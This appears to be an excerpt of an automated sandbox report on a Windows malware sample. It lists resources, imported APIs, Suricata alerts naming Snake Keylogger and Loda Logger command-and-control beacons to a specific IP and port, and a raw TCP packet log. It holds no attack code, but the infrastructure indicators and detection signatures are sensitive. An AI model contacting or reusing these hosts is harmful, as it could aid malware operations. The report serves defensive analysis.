RT_GROUP_CURSOR	0x1abba0	0x14	Lotus unknown worksheet or configuration, revision 0x1			1.25
RT_GROUP_CURSOR	0x1abbb4	0x14	Lotus unknown worksheet or configuration, revision 0x1			1.3
RT_GROUP_CURSOR	0x1abbc8	0x14	Lotus unknown worksheet or configuration, revision 0x1			1.3
RT_GROUP_CURSOR	0x1abbdc	0x14	Lotus unknown worksheet or configuration, revision 0x1			1.3
RT_GROUP_CURSOR	0x1abbf0	0x14	Lotus unknown worksheet or configuration, revision 0x1			1.3
RT_GROUP_CURSOR	0x1abc04	0x14	Lotus unknown worksheet or configuration, revision 0x1			1.3
RT_GROUP_ICON	0x1abc18	0x14	data	Turkish	Turkey	1.1
RT_VERSION	0x1abc2c	0x304	data	Turkish	Turkey	0.42875647668393785

Imports

DLL	Import
kernel32.dll	DeleteCriticalSection, LeaveCriticalSection, EnterCriticalSection, InitializeCriticalSection, VirtualFree, VirtualAlloc, LocalFree, LocalAlloc, GetTickCount, QueryPerformanceCounter, GetVersion, GetCurrentThreadId, InterlockedDecrement, InterlockedIncrement, VirtualQuery, WideCharToMultiByte, SetCurrentDirectoryA, MultiByteToWideChar, lstrlenA, lstrcpynA, LoadLibraryExA, GetThreadLocale, GetStartupInfoA, GetProcAddress, GetModuleHandleA, GetModuleFileNameA, GetLocaleInfoA, GetLastError, GetCurrentDirectoryA, GetCommandLineA, FreeLibrary, FindFirstFileA, FindClose, ExitProcess, ExitThread, CreateThread, WriteFile, UnhandledExceptionFilter, SetFilePointer, SetEndOfFile, RtlUnwind, ReadFile, RaiseException, GetStdHandle, GetFileSize, GetFileType, CreateFileA, CloseHandle
user32.dll	GetKeyboardType, LoadStringA, MessageBoxA, CharNextA
advapi32.dll	RegQueryValueExA, RegOpenKeyExA, RegCloseKey
oleaut32.dll	SysFreeString, SysReAllocStringLen, SysAllocStringLen
kernel32.dll	TlsSetValue, TlsGetValue, LocalAlloc, GetModuleHandleA
advapi32.dll	RegSetValueExA, RegQueryValueExA, RegOpenKeyExA, RegNotifyChangeKeyValue, RegFlushKey, RegDeleteValueA, RegCreateKeyExA, RegCloseKey, OpenProcessToken, LookupPrivilegeValueA, GetUserNameA, AdjustTokenPrivileges
kernel32.dll	lstrcpyA, WritePrivateProfileStringA, WriteFile, WaitForSingleObject, WaitForMultipleObjects, VirtualQuery, VirtualAlloc, UpdateResourceA, UnmapViewOfFile, TerminateProcess, Sleep, SizeofResource, SetThreadLocale, SetFilePointer, SetFileAttributesA, SetEvent, SetErrorMode, SetEndOfFile, ResumeThread, ResetEvent, RemoveDirectoryA, ReadFile, OpenProcess, OpenMutexA, MultiByteToWideChar, MulDiv, MoveFileA, MapViewOfFile, LockResource, LoadResource, LoadLibraryA, LeaveCriticalSection, InitializeCriticalSection, GlobalUnlock, GlobalReAlloc, GlobalHandle, GlobalLock, GlobalFree, GlobalFindAtomA, GlobalDeleteAtom, GlobalAlloc, GlobalAddAtomA, GetVersionExA, GetVersion, GetTimeZoneInformation, GetTickCount, GetThreadLocale, GetTempPathA, GetTempFileNameA, GetSystemInfo, GetSystemDirectoryA, GetStringTypeExA, GetStdHandle, GetProcAddress, GetPrivateProfileStringA, GetModuleHandleA, GetModuleFileNameA, GetLogicalDrives, GetLocaleInfoA, GetLocalTime, GetLastError, GetFullPathNameA, GetFileSize, GetFileAttributesA, GetExitCodeThread, GetDriveTypeA, GetDiskFreeSpaceA, GetDateFormatA, GetCurrentThreadId, GetCurrentProcessId, GetCurrentProcess, GetComputerNameA, GetCPInfo, GetACP, FreeResource, InterlockedIncrement, InterlockedExchange, InterlockedDecrement, FreeLibrary, FormatMessageA, FindResourceA, FindNextFileA, FindFirstFileA, FindClose, FileTimeToLocalFileTime, FileTimeToDosDateTime, EnumCalendarInfoA, EnterCriticalSection, EndUpdateResourceA, DeleteFileA, DeleteCriticalSection, CreateThread, CreateProcessA, CreatePipe, CreateMutexA, CreateFileMappingA, CreateFileA, CreateEventA, CreateDirectoryA, CopyFileA, CompareStringA, CloseHandle, BeginUpdateResourceA
version.dll	VerQueryValueA, GetFileVersionInfoSizeA, GetFileVersionInfoA
gdi32.dll	UnrealizeObject, StretchBlt, SetWindowOrgEx, SetWinMetaFileBits, SetViewportOrgEx, SetTextColor, SetStretchBltMode, SetROP2, SetPixel, SetEnhMetaFileBits, SetDIBColorTable, SetBrushOrgEx, SetBkMode, SetBkColor, SelectPalette, SelectObject, SaveDC, RestoreDC, RectVisible, RealizePalette, PlayEnhMetaFile, PatBlt, MoveToEx, MaskBlt, LineTo, IntersectClipRect, GetWindowOrgEx, GetWinMetaFileBits, GetTextMetricsA, GetTextExtentPoint32A, GetSystemPaletteEntries, GetStockObject, GetPixel, GetPaletteEntries, GetObjectA, GetEnhMetaFilePaletteEntries, GetEnhMetaFileHeader, GetEnhMetaFileBits, GetDeviceCaps, GetDIBits, GetDIBColorTable, GetDCOrgEx, GetCurrentPositionEx, GetClipBox, GetBrushOrgEx, GetBitmapBits, GdiFlush, ExcludeClipRect, DeleteObject, DeleteEnhMetaFile, DeleteDC, CreateSolidBrush, CreatePenIndirect, CreatePalette, CreateHalftonePalette, CreateFontIndirectA, CreateDIBitmap, CreateDIBSection, CreateCompatibleDC, CreateCompatibleBitmap, CreateBrushIndirect, CreateBitmap, CopyEnhMetaFileA, BitBlt
user32.dll	CreateWindowExA, WindowFromPoint, WinHelpA, WaitMessage, UpdateWindow, UnregisterClassA, UnhookWindowsHookEx, TranslateMessage, TranslateMDISysAccel, TrackPopupMenu, ToAsciiEx, SystemParametersInfoA, ShowWindow, ShowScrollBar, ShowOwnedPopups, ShowCursor, SetWindowsHookExA, SetWindowTextA, SetWindowPos, SetWindowPlacement, SetWindowLongA, SetTimer, SetScrollRange, SetScrollPos, SetScrollInfo, SetRect, SetPropA, SetParent, SetMenuItemInfoA, SetMenu, SetForegroundWindow, SetFocus, SetCursor, SetClassLongA, SetCapture, SetActiveWindow, SendMessageA, ScrollWindow, ScreenToClient, RemovePropA, RemoveMenu, ReleaseDC, ReleaseCapture, RegisterWindowMessageA, RegisterClipboardFormatA, RegisterClassA, RedrawWindow, PtInRect, PostQuitMessage, PostMessageA, PeekMessageA, OffsetRect, OemToCharA, MsgWaitForMultipleObjects, MessageBoxA, MapWindowPoints, MapVirtualKeyExA, MapVirtualKeyA, LoadStringA, LoadKeyboardLayoutA, LoadIconA, LoadCursorA, LoadBitmapA, KillTimer, IsZoomed, IsWindowVisible, IsWindowEnabled, IsWindow, IsRectEmpty, IsIconic, IsDialogMessageA, IsChild, InvalidateRect, IntersectRect, InsertMenuItemA, InsertMenuA, InflateRect, GetWindowThreadProcessId, GetWindowTextLengthA, GetWindowTextA, GetWindowRect, GetWindowPlacement, GetWindowLongA, GetWindowDC, GetTopWindow, GetSystemMetrics, GetSystemMenu, GetSysColorBrush, GetSysColor, GetSubMenu, GetScrollRange, GetScrollPos, GetScrollInfo, GetPropA, GetParent, GetWindow, GetMenuStringA, GetMenuState, GetMenuItemInfoA, GetMenuItemID, GetMenuItemCount, GetMenu, GetLastActivePopup, GetKeyboardState, GetKeyboardLayoutList, GetKeyboardLayout, GetKeyState, GetKeyNameTextA, GetIconInfo, GetForegroundWindow, GetFocus, GetDesktopWindow, GetDCEx, GetDC, GetCursorPos, GetCursor, GetClipboardData, GetClientRect, GetClassNameA, GetClassInfoA, GetCapture, GetActiveWindow, FrameRect, FindWindowA, FillRect, EqualRect, EnumWindows, EnumThreadWindows, EndPaint, EnableWindow, EnableScrollBar, EnableMenuItem, DrawTextA, DrawMenuBar, DrawIconEx, DrawIcon, DrawFrameControl, DrawEdge, DispatchMessageA, DestroyWindow, DestroyMenu, DestroyIcon, DestroyCursor, DeleteMenu, DefWindowProcA, DefMDIChildProcA, DefFrameProcA, CreatePopupMenu, CreateMenu, CreateIcon, ClientToScreen, CheckMenuItem, CallWindowProcA, CallNextHookEx, BeginPaint, CharNextA, CharLowerBuffA, CharLowerA, CharUpperBuffA, CharToOemA, AdjustWindowRectEx, ActivateKeyboardLayout
ole32.dll	CLSIDFromString
kernel32.dll	Sleep
oleaut32.dll	SafeArrayPtrOfIndex, SafeArrayGetUBound, SafeArrayGetLBound, SafeArrayCreate, VariantChangeType, VariantCopyInd, VariantCopy, VariantClear, VariantInit
ole32.dll	CLSIDFromProgID, CoCreateInstance, CoUninitialize, CoInitialize
oleaut32.dll	GetErrorInfo, SysFreeString
comctl32.dll	ImageList_SetIconSize, ImageList_GetIconSize, ImageList_Write, ImageList_Read, ImageList_GetDragImage, ImageList_DragShowNolock, ImageList_SetDragCursorImage, ImageList_DragMove, ImageList_DragLeave, ImageList_DragEnter, ImageList_EndDrag, ImageList_BeginDrag, ImageList_Remove, ImageList_DrawEx, ImageList_Draw, ImageList_GetBkColor, ImageList_SetBkColor, ImageList_ReplaceIcon, ImageList_Add, ImageList_GetImageCount, ImageList_Destroy, ImageList_Create
shell32.dll	ShellExecuteExA, ExtractIconExW
wininet.dll	InternetGetConnectedState, InternetReadFile, InternetOpenUrlA, InternetOpenA, InternetCloseHandle
shell32.dll	SHGetSpecialFolderLocation, SHGetPathFromIDListA, SHGetMalloc, SHGetDesktopFolder
advapi32.dll	OpenSCManagerA, CloseServiceHandle
wsock32.dll	WSACleanup, WSAStartup, gethostname, gethostbyname, inet_ntoa
netapi32.dll	Netbios

Possible Origin

Language of compilation system	Country where language is spoken	Map
Turkish	Turkey

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-12-30T11:25:10.157159+0100	2849885	ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin	1	192.168.2.10	49820	172.111.138.100	5552	TCP
2024-12-30T11:25:10.157159+0100	2849885	ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin	1	192.168.2.10	49930	172.111.138.100	5552	TCP
2024-12-30T11:25:10.157159+0100	2849885	ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin	1	192.168.2.10	50115	172.111.138.100	5552	TCP
2024-12-30T11:25:10.157159+0100	2849885	ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin	1	192.168.2.10	50030	172.111.138.100	5552	TCP
2024-12-30T11:25:10.157159+0100	2849885	ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin	1	192.168.2.10	50101	172.111.138.100	5552	TCP
2024-12-30T11:25:25.592212+0100	2044887	ET MALWARE Snake Keylogger Payload Request (GET)	1	192.168.2.10	49784	216.58.206.46	443	TCP
2024-12-30T11:25:25.608141+0100	2044887	ET MALWARE Snake Keylogger Payload Request (GET)	1	192.168.2.10	49783	216.58.206.46	443	TCP
2024-12-30T11:25:26.018350+0100	2832617	ETPRO MALWARE W32.Bloat-A Checkin	1	192.168.2.10	49792	69.42.215.252	80	TCP
2024-12-30T11:25:26.946191+0100	2044887	ET MALWARE Snake Keylogger Payload Request (GET)	1	192.168.2.10	49796	216.58.206.46	443	TCP
2024-12-30T11:25:27.216507+0100	2044887	ET MALWARE Snake Keylogger Payload Request (GET)	1	192.168.2.10	49797	216.58.206.46	443	TCP
2024-12-30T11:25:28.009425+0100	2044887	ET MALWARE Snake Keylogger Payload Request (GET)	1	192.168.2.10	49808	216.58.206.46	443	TCP
2024-12-30T11:25:28.263687+0100	2822116	ETPRO MALWARE Loda Logger CnC Beacon	1	192.168.2.10	49820	172.111.138.100	5552	TCP
2024-12-30T11:25:28.263687+0100	2849885	ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin	1	192.168.2.10	49820	172.111.138.100	5552	TCP
2024-12-30T11:25:28.292270+0100	2044887	ET MALWARE Snake Keylogger Payload Request (GET)	1	192.168.2.10	49809	216.58.206.46	443	TCP
2024-12-30T11:25:29.021760+0100	2044887	ET MALWARE Snake Keylogger Payload Request (GET)	1	192.168.2.10	49818	216.58.206.46	443	TCP
2024-12-30T11:25:29.286271+0100	2044887	ET MALWARE Snake Keylogger Payload Request (GET)	1	192.168.2.10	49822	216.58.206.46	443	TCP
2024-12-30T11:25:30.518384+0100	2044887	ET MALWARE Snake Keylogger Payload Request (GET)	1	192.168.2.10	49834	216.58.206.46	443	TCP
2024-12-30T11:25:30.705941+0100	2044887	ET MALWARE Snake Keylogger Payload Request (GET)	1	192.168.2.10	49839	216.58.206.46	443	TCP
2024-12-30T11:25:31.495780+0100	2044887	ET MALWARE Snake Keylogger Payload Request (GET)	1	192.168.2.10	49848	216.58.206.46	443	TCP
2024-12-30T11:25:31.707683+0100	2044887	ET MALWARE Snake Keylogger Payload Request (GET)	1	192.168.2.10	49855	216.58.206.46	443	TCP
2024-12-30T11:25:32.621116+0100	2044887	ET MALWARE Snake Keylogger Payload Request (GET)	1	192.168.2.10	49863	216.58.206.46	443	TCP
2024-12-30T11:25:32.676616+0100	2044887	ET MALWARE Snake Keylogger Payload Request (GET)	1	192.168.2.10	49865	216.58.206.46	443	TCP
2024-12-30T11:25:33.553344+0100	2044887	ET MALWARE Snake Keylogger Payload Request (GET)	1	192.168.2.10	49875	216.58.206.46	443	TCP
2024-12-30T11:25:33.553446+0100	2044887	ET MALWARE Snake Keylogger Payload Request (GET)	1	192.168.2.10	49874	216.58.206.46	443	TCP
2024-12-30T11:25:34.532004+0100	2044887	ET MALWARE Snake Keylogger Payload Request (GET)	1	192.168.2.10	49887	216.58.206.46	443	TCP
2024-12-30T11:25:34.553408+0100	2044887	ET MALWARE Snake Keylogger Payload Request (GET)	1	192.168.2.10	49886	216.58.206.46	443	TCP
2024-12-30T11:25:35.757317+0100	2044887	ET MALWARE Snake Keylogger Payload Request (GET)	1	192.168.2.10	49894	216.58.206.46	443	TCP
2024-12-30T11:25:35.846794+0100	2044887	ET MALWARE Snake Keylogger Payload Request (GET)	1	192.168.2.10	49896	216.58.206.46	443	TCP
2024-12-30T11:25:36.742699+0100	2044887	ET MALWARE Snake Keylogger Payload Request (GET)	1	192.168.2.10	49910	216.58.206.46	443	TCP
2024-12-30T11:25:36.855745+0100	2044887	ET MALWARE Snake Keylogger Payload Request (GET)	1	192.168.2.10	49911	216.58.206.46	443	TCP
2024-12-30T11:25:37.619794+0100	2849885	ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin	1	192.168.2.10	49930	172.111.138.100	5552	TCP
2024-12-30T11:25:38.054812+0100	2044887	ET MALWARE Snake Keylogger Payload Request (GET)	1	192.168.2.10	49921	216.58.206.46	443	TCP
2024-12-30T11:25:38.055872+0100	2044887	ET MALWARE Snake Keylogger Payload Request (GET)	1	192.168.2.10	49923	216.58.206.46	443	TCP
2024-12-30T11:25:46.738542+0100	2849885	ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin	1	192.168.2.10	50030	172.111.138.100	5552	TCP
2024-12-30T11:25:55.757927+0100	2849885	ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin	1	192.168.2.10	50101	172.111.138.100	5552	TCP
2024-12-30T11:26:04.858055+0100	2822116	ETPRO MALWARE Loda Logger CnC Beacon	1	192.168.2.10	50115	172.111.138.100	5552	TCP
2024-12-30T11:26:04.858055+0100	2849885	ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin	1	192.168.2.10	50115	172.111.138.100	5552	TCP
2024-12-30T11:26:32.615181+0100	2830912	ETPRO MALWARE Loda Logger CnC Beacon Response M2	1	172.111.138.100	5552	192.168.2.10	50115	TCP
2024-12-30T11:27:06.019337+0100	2830912	ETPRO MALWARE Loda Logger CnC Beacon Response M2	1	172.111.138.100	5552	192.168.2.10	50115	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 30, 2024 11:25:24.572650909 CET	49783	443	192.168.2.10	216.58.206.46
Dec 30, 2024 11:25:24.572690964 CET	443	49783	216.58.206.46	192.168.2.10
Dec 30, 2024 11:25:24.572766066 CET	49783	443	192.168.2.10	216.58.206.46
Dec 30, 2024 11:25:24.575745106 CET	49784	443	192.168.2.10	216.58.206.46
Dec 30, 2024 11:25:24.575782061 CET	443	49784	216.58.206.46	192.168.2.10
Dec 30, 2024 11:25:24.575839043 CET	49784	443	192.168.2.10	216.58.206.46
Dec 30, 2024 11:25:24.592679977 CET	49783	443	192.168.2.10	216.58.206.46
Dec 30, 2024 11:25:24.592700005 CET	443	49783	216.58.206.46	192.168.2.10
Dec 30, 2024 11:25:24.592757940 CET	49784	443	192.168.2.10	216.58.206.46
Dec 30, 2024 11:25:24.592775106 CET	443	49784	216.58.206.46	192.168.2.10
Dec 30, 2024 11:25:25.196212053 CET	443	49784	216.58.206.46	192.168.2.10
Dec 30, 2024 11:25:25.196285009 CET	49784	443	192.168.2.10	216.58.206.46
Dec 30, 2024 11:25:25.196484089 CET	443	49783	216.58.206.46	192.168.2.10
Dec 30, 2024 11:25:25.196552038 CET	49783	443	192.168.2.10	216.58.206.46
Dec 30, 2024 11:25:25.197004080 CET	443	49784	216.58.206.46	192.168.2.10
Dec 30, 2024 11:25:25.197053909 CET	49784	443	192.168.2.10	216.58.206.46
Dec 30, 2024 11:25:25.197299957 CET	443	49783	216.58.206.46	192.168.2.10
Dec 30, 2024 11:25:25.197344065 CET	49783	443	192.168.2.10	216.58.206.46
Dec 30, 2024 11:25:25.296132088 CET	49783	443	192.168.2.10	216.58.206.46
Dec 30, 2024 11:25:25.296145916 CET	443	49783	216.58.206.46	192.168.2.10
Dec 30, 2024 11:25:25.296385050 CET	49784	443	192.168.2.10	216.58.206.46
Dec 30, 2024 11:25:25.296418905 CET	443	49784	216.58.206.46	192.168.2.10
Dec 30, 2024 11:25:25.296513081 CET	443	49783	216.58.206.46	192.168.2.10
Dec 30, 2024 11:25:25.296776056 CET	49783	443	192.168.2.10	216.58.206.46
Dec 30, 2024 11:25:25.296782970 CET	443	49784	216.58.206.46	192.168.2.10
Dec 30, 2024 11:25:25.297389984 CET	49784	443	192.168.2.10	216.58.206.46
Dec 30, 2024 11:25:25.306689978 CET	49784	443	192.168.2.10	216.58.206.46
Dec 30, 2024 11:25:25.311572075 CET	49783	443	192.168.2.10	216.58.206.46
Dec 30, 2024 11:25:25.351331949 CET	443	49784	216.58.206.46	192.168.2.10
Dec 30, 2024 11:25:25.359328032 CET	443	49783	216.58.206.46	192.168.2.10
Dec 30, 2024 11:25:25.411036015 CET	49792	80	192.168.2.10	69.42.215.252
Dec 30, 2024 11:25:25.415930033 CET	80	49792	69.42.215.252	192.168.2.10
Dec 30, 2024 11:25:25.416049957 CET	49792	80	192.168.2.10	69.42.215.252
Dec 30, 2024 11:25:25.416285038 CET	49792	80	192.168.2.10	69.42.215.252
Dec 30, 2024 11:25:25.421046972 CET	80	49792	69.42.215.252	192.168.2.10
Dec 30, 2024 11:25:25.592083931 CET	443	49784	216.58.206.46	192.168.2.10
Dec 30, 2024 11:25:25.592281103 CET	49784	443	192.168.2.10	216.58.206.46
Dec 30, 2024 11:25:25.593030930 CET	443	49784	216.58.206.46	192.168.2.10
Dec 30, 2024 11:25:25.593087912 CET	443	49784	216.58.206.46	192.168.2.10
Dec 30, 2024 11:25:25.593118906 CET	49784	443	192.168.2.10	216.58.206.46
Dec 30, 2024 11:25:25.593142033 CET	49784	443	192.168.2.10	216.58.206.46
Dec 30, 2024 11:25:25.604350090 CET	49784	443	192.168.2.10	216.58.206.46
Dec 30, 2024 11:25:25.604367018 CET	443	49784	216.58.206.46	192.168.2.10
Dec 30, 2024 11:25:25.608153105 CET	443	49783	216.58.206.46	192.168.2.10
Dec 30, 2024 11:25:25.608251095 CET	49783	443	192.168.2.10	216.58.206.46
Dec 30, 2024 11:25:25.608269930 CET	443	49783	216.58.206.46	192.168.2.10
Dec 30, 2024 11:25:25.608311892 CET	49783	443	192.168.2.10	216.58.206.46
Dec 30, 2024 11:25:25.608458996 CET	443	49783	216.58.206.46	192.168.2.10
Dec 30, 2024 11:25:25.608505964 CET	443	49783	216.58.206.46	192.168.2.10
Dec 30, 2024 11:25:25.608611107 CET	49783	443	192.168.2.10	216.58.206.46
Dec 30, 2024 11:25:25.665921926 CET	49796	443	192.168.2.10	216.58.206.46
Dec 30, 2024 11:25:25.665983915 CET	443	49796	216.58.206.46	192.168.2.10
Dec 30, 2024 11:25:25.666059971 CET	49796	443	192.168.2.10	216.58.206.46
Dec 30, 2024 11:25:25.666685104 CET	49796	443	192.168.2.10	216.58.206.46
Dec 30, 2024 11:25:25.666712999 CET	443	49796	216.58.206.46	192.168.2.10
Dec 30, 2024 11:25:25.666989088 CET	49783	443	192.168.2.10	216.58.206.46
Dec 30, 2024 11:25:25.667017937 CET	443	49783	216.58.206.46	192.168.2.10
Dec 30, 2024 11:25:25.667433977 CET	49797	443	192.168.2.10	216.58.206.46
Dec 30, 2024 11:25:25.667469978 CET	443	49797	216.58.206.46	192.168.2.10
Dec 30, 2024 11:25:25.667587042 CET	49797	443	192.168.2.10	216.58.206.46
Dec 30, 2024 11:25:25.667928934 CET	49797	443	192.168.2.10	216.58.206.46
Dec 30, 2024 11:25:25.667942047 CET	443	49797	216.58.206.46	192.168.2.10
Dec 30, 2024 11:25:25.737147093 CET	49798	443	192.168.2.10	142.250.184.225
Dec 30, 2024 11:25:25.737179995 CET	443	49798	142.250.184.225	192.168.2.10
Dec 30, 2024 11:25:25.737278938 CET	49798	443	192.168.2.10	142.250.184.225
Dec 30, 2024 11:25:25.737818956 CET	49798	443	192.168.2.10	142.250.184.225
Dec 30, 2024 11:25:25.737833977 CET	443	49798	142.250.184.225	192.168.2.10
Dec 30, 2024 11:25:25.739470005 CET	49799	443	192.168.2.10	142.250.184.225
Dec 30, 2024 11:25:25.739520073 CET	443	49799	142.250.184.225	192.168.2.10
Dec 30, 2024 11:25:25.739742994 CET	49799	443	192.168.2.10	142.250.184.225
Dec 30, 2024 11:25:25.740259886 CET	49799	443	192.168.2.10	142.250.184.225
Dec 30, 2024 11:25:25.740287066 CET	443	49799	142.250.184.225	192.168.2.10
Dec 30, 2024 11:25:26.018228054 CET	80	49792	69.42.215.252	192.168.2.10
Dec 30, 2024 11:25:26.018349886 CET	49792	80	192.168.2.10	69.42.215.252
Dec 30, 2024 11:25:26.274991035 CET	443	49796	216.58.206.46	192.168.2.10
Dec 30, 2024 11:25:26.276015997 CET	49796	443	192.168.2.10	216.58.206.46
Dec 30, 2024 11:25:26.360102892 CET	443	49797	216.58.206.46	192.168.2.10
Dec 30, 2024 11:25:26.362838984 CET	49797	443	192.168.2.10	216.58.206.46
Dec 30, 2024 11:25:26.364504099 CET	443	49799	142.250.184.225	192.168.2.10
Dec 30, 2024 11:25:26.364583969 CET	49799	443	192.168.2.10	142.250.184.225
Dec 30, 2024 11:25:26.365190983 CET	443	49798	142.250.184.225	192.168.2.10
Dec 30, 2024 11:25:26.365247965 CET	49798	443	192.168.2.10	142.250.184.225
Dec 30, 2024 11:25:26.594475031 CET	49796	443	192.168.2.10	216.58.206.46
Dec 30, 2024 11:25:26.594516993 CET	443	49796	216.58.206.46	192.168.2.10
Dec 30, 2024 11:25:26.654827118 CET	49796	443	192.168.2.10	216.58.206.46
Dec 30, 2024 11:25:26.654855967 CET	443	49796	216.58.206.46	192.168.2.10
Dec 30, 2024 11:25:26.742305040 CET	49797	443	192.168.2.10	216.58.206.46
Dec 30, 2024 11:25:26.742322922 CET	443	49797	216.58.206.46	192.168.2.10
Dec 30, 2024 11:25:26.744565010 CET	49797	443	192.168.2.10	216.58.206.46
Dec 30, 2024 11:25:26.744569063 CET	443	49797	216.58.206.46	192.168.2.10
Dec 30, 2024 11:25:26.772170067 CET	49799	443	192.168.2.10	142.250.184.225
Dec 30, 2024 11:25:26.772213936 CET	443	49799	142.250.184.225	192.168.2.10
Dec 30, 2024 11:25:26.772582054 CET	443	49799	142.250.184.225	192.168.2.10
Dec 30, 2024 11:25:26.772634983 CET	49799	443	192.168.2.10	142.250.184.225
Dec 30, 2024 11:25:26.772690058 CET	49798	443	192.168.2.10	142.250.184.225
Dec 30, 2024 11:25:26.772706032 CET	443	49798	142.250.184.225	192.168.2.10
Dec 30, 2024 11:25:26.773030043 CET	443	49798	142.250.184.225	192.168.2.10
Dec 30, 2024 11:25:26.773092031 CET	49798	443	192.168.2.10	142.250.184.225
Dec 30, 2024 11:25:26.773183107 CET	49799	443	192.168.2.10	142.250.184.225
Dec 30, 2024 11:25:26.773484945 CET	49798	443	192.168.2.10	142.250.184.225
Dec 30, 2024 11:25:26.815330982 CET	443	49799	142.250.184.225	192.168.2.10
Dec 30, 2024 11:25:26.815330029 CET	443	49798	142.250.184.225	192.168.2.10
Dec 30, 2024 11:25:26.946202040 CET	443	49796	216.58.206.46	192.168.2.10
Dec 30, 2024 11:25:26.946365118 CET	49796	443	192.168.2.10	216.58.206.46
Dec 30, 2024 11:25:26.946387053 CET	443	49796	216.58.206.46	192.168.2.10
Dec 30, 2024 11:25:26.946422100 CET	49796	443	192.168.2.10	216.58.206.46
Dec 30, 2024 11:25:26.946975946 CET	443	49796	216.58.206.46	192.168.2.10
Dec 30, 2024 11:25:26.947025061 CET	443	49796	216.58.206.46	192.168.2.10
Dec 30, 2024 11:25:26.947068930 CET	49796	443	192.168.2.10	216.58.206.46
Dec 30, 2024 11:25:26.951864004 CET	49796	443	192.168.2.10	216.58.206.46
Dec 30, 2024 11:25:26.951878071 CET	443	49796	216.58.206.46	192.168.2.10
Dec 30, 2024 11:25:26.952786922 CET	49808	443	192.168.2.10	216.58.206.46
Dec 30, 2024 11:25:26.952822924 CET	443	49808	216.58.206.46	192.168.2.10
Dec 30, 2024 11:25:26.952896118 CET	49808	443	192.168.2.10	216.58.206.46
Dec 30, 2024 11:25:26.953183889 CET	49808	443	192.168.2.10	216.58.206.46
Dec 30, 2024 11:25:26.953198910 CET	443	49808	216.58.206.46	192.168.2.10
Dec 30, 2024 11:25:27.216511965 CET	443	49797	216.58.206.46	192.168.2.10
Dec 30, 2024 11:25:27.216669083 CET	49797	443	192.168.2.10	216.58.206.46
Dec 30, 2024 11:25:27.216687918 CET	443	49797	216.58.206.46	192.168.2.10
Dec 30, 2024 11:25:27.216794968 CET	49797	443	192.168.2.10	216.58.206.46
Dec 30, 2024 11:25:27.217350960 CET	49797	443	192.168.2.10	216.58.206.46
Dec 30, 2024 11:25:27.217410088 CET	443	49797	216.58.206.46	192.168.2.10
Dec 30, 2024 11:25:27.217502117 CET	49797	443	192.168.2.10	216.58.206.46
Dec 30, 2024 11:25:27.217988014 CET	49809	443	192.168.2.10	216.58.206.46
Dec 30, 2024 11:25:27.218038082 CET	443	49809	216.58.206.46	192.168.2.10
Dec 30, 2024 11:25:27.218216896 CET	49809	443	192.168.2.10	216.58.206.46
Dec 30, 2024 11:25:27.218462944 CET	49809	443	192.168.2.10	216.58.206.46
Dec 30, 2024 11:25:27.218476057 CET	443	49809	216.58.206.46	192.168.2.10
Dec 30, 2024 11:25:27.269260883 CET	443	49798	142.250.184.225	192.168.2.10
Dec 30, 2024 11:25:27.269306898 CET	443	49798	142.250.184.225	192.168.2.10
Dec 30, 2024 11:25:27.269313097 CET	49798	443	192.168.2.10	142.250.184.225
Dec 30, 2024 11:25:27.269335032 CET	443	49798	142.250.184.225	192.168.2.10
Dec 30, 2024 11:25:27.269365072 CET	49798	443	192.168.2.10	142.250.184.225
Dec 30, 2024 11:25:27.269386053 CET	49798	443	192.168.2.10	142.250.184.225
Dec 30, 2024 11:25:27.269392014 CET	443	49798	142.250.184.225	192.168.2.10
Dec 30, 2024 11:25:27.269438028 CET	443	49798	142.250.184.225	192.168.2.10
Dec 30, 2024 11:25:27.269479990 CET	49798	443	192.168.2.10	142.250.184.225
Dec 30, 2024 11:25:27.287656069 CET	49798	443	192.168.2.10	142.250.184.225
Dec 30, 2024 11:25:27.287678957 CET	443	49798	142.250.184.225	192.168.2.10
Dec 30, 2024 11:25:27.289073944 CET	49810	443	192.168.2.10	142.250.184.225
Dec 30, 2024 11:25:27.289119005 CET	443	49810	142.250.184.225	192.168.2.10
Dec 30, 2024 11:25:27.289475918 CET	49810	443	192.168.2.10	142.250.184.225
Dec 30, 2024 11:25:27.289897919 CET	49810	443	192.168.2.10	142.250.184.225
Dec 30, 2024 11:25:27.289907932 CET	443	49810	142.250.184.225	192.168.2.10
Dec 30, 2024 11:25:27.415235996 CET	443	49799	142.250.184.225	192.168.2.10
Dec 30, 2024 11:25:27.415287018 CET	443	49799	142.250.184.225	192.168.2.10
Dec 30, 2024 11:25:27.415307999 CET	49799	443	192.168.2.10	142.250.184.225
Dec 30, 2024 11:25:27.415344954 CET	443	49799	142.250.184.225	192.168.2.10
Dec 30, 2024 11:25:27.415365934 CET	49799	443	192.168.2.10	142.250.184.225
Dec 30, 2024 11:25:27.415389061 CET	49799	443	192.168.2.10	142.250.184.225
Dec 30, 2024 11:25:27.415438890 CET	443	49799	142.250.184.225	192.168.2.10
Dec 30, 2024 11:25:27.415476084 CET	49799	443	192.168.2.10	142.250.184.225
Dec 30, 2024 11:25:27.415488958 CET	443	49799	142.250.184.225	192.168.2.10
Dec 30, 2024 11:25:27.415528059 CET	49799	443	192.168.2.10	142.250.184.225
Dec 30, 2024 11:25:27.416344881 CET	49799	443	192.168.2.10	142.250.184.225
Dec 30, 2024 11:25:27.416368008 CET	443	49799	142.250.184.225	192.168.2.10
Dec 30, 2024 11:25:27.417201996 CET	49812	443	192.168.2.10	142.250.184.225
Dec 30, 2024 11:25:27.417248964 CET	443	49812	142.250.184.225	192.168.2.10
Dec 30, 2024 11:25:27.417301893 CET	49812	443	192.168.2.10	142.250.184.225
